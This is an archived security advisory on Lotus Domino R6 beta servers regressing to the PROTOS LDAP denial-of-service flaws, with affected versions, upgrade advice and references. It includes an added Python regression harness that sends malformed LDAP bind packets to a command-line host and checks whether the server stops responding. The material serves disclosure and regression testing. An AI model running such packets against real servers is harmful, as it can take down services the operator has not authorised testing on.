14th Mar 2003 [SBWID-6063]
COMMAND
	Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression
SYSTEMS AFFECTED
	1. Affected system(s):
	   KNOWN VULNERABLE:
	    o Lotus Notes/Domino R6 pre-release and beta versions
	    o Lotus Domino R5.0.7 and earlier
	   NOT VULNERABLE:
	    o Lotus Notes/Domino R6.0 Gold
	    o Lotus Notes/Domino R6.0.1
	    o Lotus Notes/Domino R5.0.7a through R5.0.12
PROBLEM
	
	_______________________________________________________________________
	                     Rapid7, Inc. Security Advisory
	      Visit http://www.rapid7.com/ to download NeXpose, the
	           world's most advanced vulnerability scanner.
	       Linux and Windows 2000/XP versions are available now!
	_______________________________________________________________________
	Rapid7 Advisory R7-0012
	Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression
	   Published:  March 12, 2003
	   Revision:   1.0
	   http://www.rapid7.com/advisories/R7-0012.html
	   CVE:           CAN-2001-1311 (regression)
	   CERT Note:     583184        (regression)
	   CERT Advisory: CA-2001-18    (regression)
	   Lotus SPR:     DWUU4W6NC8    (regression)
	   Bugtraq ID:    7039
	
	2. Summary
	   In July 2001, the PROTOS protocol testing group at the University
	   of Oulu in Finland released an LDAP protocol test suite that exposed
	   flaws in LDAP implementations from multiple vendors.  [1]
	   Lotus Domino R5.0.7 and earlier were affected by the PROTOS LDAP
	   issues: the suite's malformed LDAP packets caused buffer overflows
	   and denial of service against the Domino server.  Lotus addressed
	   these issues in Domino R5.0.7a, released May 18th 2001.  [2]
	   While regression testing the pre-release and beta versions of Lotus
	   Domino R6 with the PROTOS LDAP test suite, we found that these
	   releases were again vulnerable to the issues PROTOS discovered; the
	   R5.0.7a fixes had regressed in the R6 beta code.
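	   The regression test described above, as an added example that is
	   not code from Rapid7 or the PROTOS project: it hand-encodes the
	   anonymous LDAPv3 BindRequest in BER, decodes the BindResponse, and,
	   after sending each of a few malformed variants (hand-written
	   illustrations of the kind of input PROTOS generates, not the PROTOS
	   test cases themselves), checks that the server still answers a
	   well-formed bind.  Host and port are assumptions supplied on the
	   command line.  The bounds checks in ber_read are the checks an LDAP
	   decoder needs in order to survive such input.

```python
"""PROTOS-style LDAP liveness regression harness (added example; not Rapid7's
or PROTOS's code).  Host/port are caller-supplied assumptions.  The malformed
cases are illustrative and are NOT the PROTOS test suite."""
import socket


def ber_len(n):
    """Encode a BER length: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def ber_int(value):
    """Encode a non-negative INTEGER (extra byte when the top bit is set)."""
    if value < 0:
        raise ValueError("negative integers not needed here")
    return ber_tlv(0x02, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big"))


def bind_request(msg_id, dn=b"", password=b"", version=3):
    """LDAPMessage { messageID, BindRequest [APPLICATION 0] { version, name, simple [0] } }."""
    op = ber_int(version) + ber_tlv(0x04, dn) + ber_tlv(0x80, password)
    return ber_tlv(0x30, ber_int(msg_id) + ber_tlv(0x60, op))


def ber_read(buf, pos=0):
    """Return (tag, content, next_pos).  Every bound is checked, so malformed
    input raises ValueError instead of reading past the buffer."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80 == 0:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4:
            raise ValueError("unsupported length encoding")
        if pos + nbytes > len(buf):
            raise ValueError("truncated length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("declared length exceeds buffer")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_response(data):
    """Return (messageID, resultCode) from a BindResponse [APPLICATION 1]."""
    tag, msg, _ = ber_read(data)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    id_tag, id_bytes, pos = ber_read(msg)
    if id_tag != 0x02 or not id_bytes:
        raise ValueError("bad messageID")
    op_tag, op, _ = ber_read(msg, pos)
    if op_tag != 0x61:
        raise ValueError("not a BindResponse")
    rc_tag, rc, _ = ber_read(op)
    if rc_tag != 0x0A or not rc:
        raise ValueError("bad resultCode")
    return int.from_bytes(id_bytes, "big", signed=True), int.from_bytes(rc, "big", signed=True)


def malformed_cases(packet):
    """Hand-written malformations in the PROTOS spirit (illustrative only)."""
    yield "truncated", packet[: len(packet) // 2]
    yield "outer-length-huge", packet[:1] + b"\x84\xff\xff\xff\xff" + packet[2:]
    yield "oversized-dn", bind_request(1, dn=b"A" * 70000)


def ldap_alive(host, port=389, timeout=5.0):
    """True if the server answers an anonymous bind with resultCode success (0)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(bind_request(1))
            return parse_bind_response(s.recv(4096))[1] == 0
    except (OSError, ValueError):
        return False


def regression_run(host, port=389):
    """Send each malformed case, then re-check liveness; return the names of
    the cases after which the server no longer answered a valid bind."""
    failed = []
    for name, case in malformed_cases(bind_request(1)):
        try:
            with socket.create_connection((host, port), timeout=5.0) as s:
                s.sendall(case)
                s.settimeout(2.0)
                try:
                    s.recv(4096)  # reply, close or hang are all acceptable here
                except OSError:
                    pass
        except OSError:
            pass
        if not ldap_alive(host, port):
            failed.append(name)
    return failed


if __name__ == "__main__":
    import sys
    print(regression_run(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 389))
```

	   Run it as "python harness.py <host> [port]" against a test server;
	   an empty list means every case was survived.  Note that the harness
	   only detects the denial-of-service outcome (server stops answering);
	   a memory corruption that does not crash the process is invisible to
	   it, which is why the PROTOS results were also reviewed for overflows.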
	5. Detailed analysis
	   Credit for discovery of this vulnerability goes to the PROTOS
	   project.  Please see their LDAP test suite page for more
	   information. [1]
SOLUTION
	4. Solution
	   Users running R6 beta and pre-release builds should upgrade to R6.0
	   Gold or higher.  Because other vulnerabilities have since been
	   discovered in R6.0 Gold, upgrading directly to R6.0.1, released in
	   February 2003, is recommended.
	   Users running R5.0.7a and higher are not affected.
	   Domino incremental installers may be downloaded from the following
	   URL:
	
	      http://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ESD-DMNTSRVRi&sb=r
	
	
	3. Vendor status and information
	   Lotus
	   http://www.lotus.com/
	   http://www.ibm.com/
	   Lotus was notified and has fixed this vulnerability.  Lotus
	   originally tracked the R5 issues as SPR #DWUU4W6NC8 and is tracking
	   the R6 beta regression under the same SPR.  [3]
	   See the References section for more information.
	6. References
	   [1] PROTOS - Security Testing of Protocol Implementations
	   http://www.ee.oulu.fi/research/ouspg/protos/
	   [2] Lotus statement about LDAP vulnerability fixes
	   http://www.kb.cert.org/vuls/id/JPLA-4WESN5
	   [3] Lotus SPR #DWUU4W6NC8
	   http://www.notes.net/r5fixlist.nsf/Search!SearchView&Query=DWUU4W6NC8
	7. Contact Information
	   Rapid7 Security Advisories
	   Email:  [email protected]
	   Web:    http://www.rapid7.com/
	   Phone:  +1 (212) 558-8700
	8. Disclaimer and Copyright
	   Rapid7, Inc. is not responsible for the misuse of the information
	   provided in our security advisories.  These advisories are a service
	   to the professional security community.  There are NO WARRANTIES
	   with regard to this information.  Any application or distribution of
	   this information constitutes acceptance AS IS, at the user's own
	   risk.  This information is subject to change without notice.
	   This advisory Copyright (C) 2003 Rapid7, Inc.  Permission is
	   hereby granted to redistribute this advisory, providing that no
	   changes are made and that the copyright notices and disclaimers
	   remain intact.